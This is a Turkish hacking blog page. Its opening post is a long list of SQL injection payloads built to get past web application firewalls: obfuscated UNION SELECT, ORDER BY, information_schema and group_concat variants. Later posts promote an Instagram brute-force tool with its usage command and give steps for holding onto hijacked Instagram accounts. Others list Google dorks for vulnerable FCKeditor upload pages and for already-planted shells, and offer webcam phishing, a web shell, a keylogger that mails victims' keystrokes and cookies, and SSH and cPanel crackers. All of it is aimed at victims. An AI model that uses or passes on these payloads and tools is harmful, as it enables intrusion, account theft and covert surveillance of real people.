SQL WAF BYPASS

WAF BYPASS

Merhaba Sevgili CyberrWeb Takipçileri İnternet Üzerindeki Bir Çok Kaynağı Araştırarak Manuel Olarak SQL BYPASS Yapanların İşine Yarayacak WAF BYPASS Komutlarını Sizlere Paylaşıyoruz! Pek Çok Web Sitesinde Karşılaştıgınız WAF Korumasını Bypass Etmenize Yardım Edecektir.

ORDER BY


/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

UNION SELECT


/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

information_schema.tables 


/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

Concat


CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

Group Concat


/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

Read More

BruteSploit / İnstagram Account Hacking

BruteSploit / İnstagram Account Hacking

BruteSploit İnstagram Hesabı Hedef Alınarak Deneme Yanılma Kısaca Kaba Kuvvet Saldırısı Gerçekleştirerek, Wordlist'inizin Ne Kadar İyi Olduğunada Bağlı Şekilde Hedef Hesabın Şifresinin Kırılmasına Olağan Sağlayacaktır.

İndirmek İçin Tıklayınız!

Kullanımı Hakkında

Kullanım: ["python instabrute.py -u instaadı -w wordlistadı.txt -p proxy.txt"]

Taratma Sırasında Hedef Hesabın Şifresi Mevcut Wordlist TXT Dosyasında Bulunuyor İse Size Terminal Üzerinden Belirtecektir.

Read More

İnstagram Yorumda Sansür

İnstagram Yorumda Sansür [METHOD]

Merhaba Sevgili CyberrWeb Takipçileri Sizlere shado.killer Kod Adlı Medyacının Paylaştığı Sansürleme Method'unu Sunuyoruz!

Nedir Bu Sansürleme Method?

İnstagramda Yorumlar Veya Kullanıcılar İle Yazışmalarınızda Karşı Tarafa Atabileceginiz İlgi Çekici Şekilde Karşı Tarafa Göndereceginiz Mesaj Stili Diyebiliriz.

Örnek : https://i.hizliresim.com/uoUpBd.jpg

METHOD İçin Tıklayınız!

Read More

İnstagram Ebedi Çekme

İnstagram Ebedi Çekme [METHOD]

Vurduğunuz hesabı şüp + donuk çekin 2 saat donukta dursun 2 sonrasında hesabı IOS cihazı ile donuktan çıkarın hesaba 1-2 kere vpn ile giriş yapın şüp düştükçe geçin en son proxy ile pcden giriş yapın bundan sonra o hesap şüp düşmez + giriş hareketlerinden IOS cihazınızı ben yaptım deyip o cihazın üstüne faktör açarsanız eski iosdaki kodlar filan hiçbişi kalmaz.

Read More

FatCat Auto SQLl Injector

FatCat Auto SQLl Injector

PHP Tabanlı SQL Odaklı Olmakta Olan, İsmindende Anlaşılacağı Gibi FatCat Auto SQLI Injector Piyasanın En Eski Toollarından Olmakla Beraber Eskide Olsa Hâla Aktif Şekilde Çalışmakta Olan İşe Yarar Nadir Toollardan Birisi Olmaktadır.

Sizler İçin WAF Bypasslar Deneme Yanılma Yolu İle Size Olumlu Sonuçlar Verme Olanağı Yüksektir. Ayrıyeten İçerisinde

Cookie Header Passing
Load File
Generating XSS From SQL

Gibi Özellikleride Mevcuttur.

DOWNLOAD

Read More

FckEditor Mass Finder

FckEditor Mass Finder

FckEditor Sitelerindeki Upload Açıgını Sizler İçin Belirttiginiz Url Listinde Tek Tek Dener ve Kullanılabilir Vaziyette Olan Siteleri Sizlere Çıkartır FckEditor Dorklarını Aşağıda Size Vereceğim.

python FckFinder.py

Komutuyla Çalıştırdıktan Sonra Sizlere Url List Soracaktır Aynı Dizin İçinde Olmasına Dikkat Edin List.txt'in, Verecegim Dorklarla Tarattıgınız Siteleri Finder'e Atmanız Sizlerin Dahi İyi Sonuçlar Almasını Sağlayacaktır.

Fck Dork;

inurl:/editor/filemanager/connectors/uploadtest.html
inurl:/editor/editor/filemanager/connectors/uploadtest.html
inurl:/[path]/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
inurl:/[path]/fckeditor/editor/filemanager/connectors/uploadtest.html
inurl:/[path]/js/fckeditor/editor/filemanager/connectors/uploadtest.html
inurl:/[path]/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
inurl:/[path]/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
inurl:/FCKeditor/editor/plugins/uploadme/fck_uploadme.php

TOOL SHARE :

DOWNLOAD

Read More

CyberrWeb-IP / IP BİLGİ TOPLAYICI

CyberrWeb-IP / IP BİLGİ TOPLAYICI

CyberrWeb-IP Script'i İle Hedef Siteniz Veya Kurban IP Üzerinden Bilgi Toplamak İçin :

python hackerhub-ip.py -v {Hedef IP}

Komutunu Kullanmanız Yeterli Olacaktır.

Sizlere Aşağıdaki Mevcut Bilgileri Verecektir.

("Hedef")
("ISP")
("Organizasyon")
("Şehir")
("Bölge")
("Saat dilimi")
("Posta kodu")

DOWNLOAD

Read More

LodCam - WebCam Phishing

LodCam - WebCam Phishing

Lodcam Genel Olarak Karşı Tarafın WebCam Görüntüsünü Ele Geçirme Amaçlı Kullanılan Toollardan Birisidir Denilebilir. Oluşturdugunuz Phishing Web Uzantısına Girdiginde Karşı Kurban Kişinin Mevcut WebCam Görüntüsüne Sahip Olacaksınız Kullanımı Basit Çalıştırmak İçin Kurduktan Sonra Şu Komut'u Girmeniz Gerekmektedir :

$ bash ./lodcam.sh

DOWNLOAD 

Read More

Alfa Shell 4.1 SHELL İNDİR

Alfa Shell 4.1

Solevisible Ekibi Uzun Süre Sonra Tekrardan Yeni Bir Güncel Sürüm Yayınladı İçerisine Tekrardan Derledikleri Bypass Toolları ve İç Temasında Yaptıkları Degişiklerle Göz Çarpıcı Hale Getirilmiş Gözüküyor. İçerisinde Editleme Bölümüne İse Ayrı Bir Özen Gösterilmiş Hatalı Kodları Dahi Ayrıntılı Şekilde Görmek Mümkün Gözükmekte Yeni Güncellemeler Oldugunda Blogumuzda Paylaşmaya Devam Edecegiz Takipte Kalın.

DOWNLOAD

Read More

Web Vuln Vulnerability Scan [EXPLOİT]

Web Vuln Vulnerability Scan [EXPLOİT]

Webvuln Hedef Sitelerde Veyahut Çoklu Site Saldırılarında Kullanabileceginiz En İyi Exploitler Arasında Yer Almaktadır. XSS - SQL Gibi Güvenlik Açıklarının Tespitinde Size Yardımcı Olacaktır!

DOWNLOAD

Read More

Shell Finder Dork 2020

Shell Finder Dork 2020

Merhaba Sevgili CyberrWeb Takipçileri Shell Finder ( Shell Tarayıcı Dorklar ) İle Google Üzerinden Mevcut Shell Atılmış Sitelerden Shell Yolunu Bulabileceksiniz. Shell'in İsmini Degiştirerek Diğer Shelli Siteleri Bulabilirsiniz.

Dorklar İçin Tıklayınız!

Read More

BCHackTool

BCHackTool

BYCHAN Kod Adlı Türk Defacer'in Derledigi BCHackTool İçerisinde Bir Çok Hacking Kategorisinden Scriptler Mevcut Bulunmaktadır.

DOWNLOAD

Read More

Argus Keylogger

Argus Keylogger

Argus Keylogger Windows ve MacOS Sistemler İçin Özel Olarak Yazılmış Bir Yazılımdır Karşı Kurban Kişi Keylogger'i Yediginde;

1. Klavye Tuş Kayıt'ı
2. Ekran Görüntüsü Alma
3. Chrome Geçmişini ve Çerezleri Kontrol Etmek
4. Web Cam Kamerasından Görüntü Alma
5. Kendini Windows'ta Başlangıç'a Gizli Şekilde Ekleme

Gibi Özelliklere Sahiptir. 

Argus Keylogger Belirteceginiz Kendinize Ait Olan Mail Adresinizi Belirttiginiz Takdirde Günlük Logları Size İletmektedir.

DOWNLOAD

Read More

SSH CHECKER

SSH CHECKER

SSH Checker Brute Force Mantıgı İle Çalışmaktadır Kısa Bir Özet İle Kaba Kuvvet Saldırısı Yapar Belirteceginiz IP Listesindeki IP Adresslerine Kaba Kuvvet Saldırısı Yapacak Deneme Yanılma Yaparak Size Gerekli Sonuçları Bildirecektir.

DOWNLOAD

Read More

CPANEL CHECKER

CPANEL CHECKER

Merhabalar Sevgili CyberrWeb Takipçileri BETO-EG Kod Adlı Defacer Tarafından Yazılmış Olan IPX Cpanel Cracker'i Bugun Siz Sevgili Takipçilerimize Sunuyoruz.

Belirteceginiz Olan IP TXT Dosyasındaki IP Adreslerini Teker Teker Deneme Yanılma Yöntemi İle Tarayıp Size En Hızlı Şekilde Sonuçları Vermektedir.

DOWNLOAD

Read More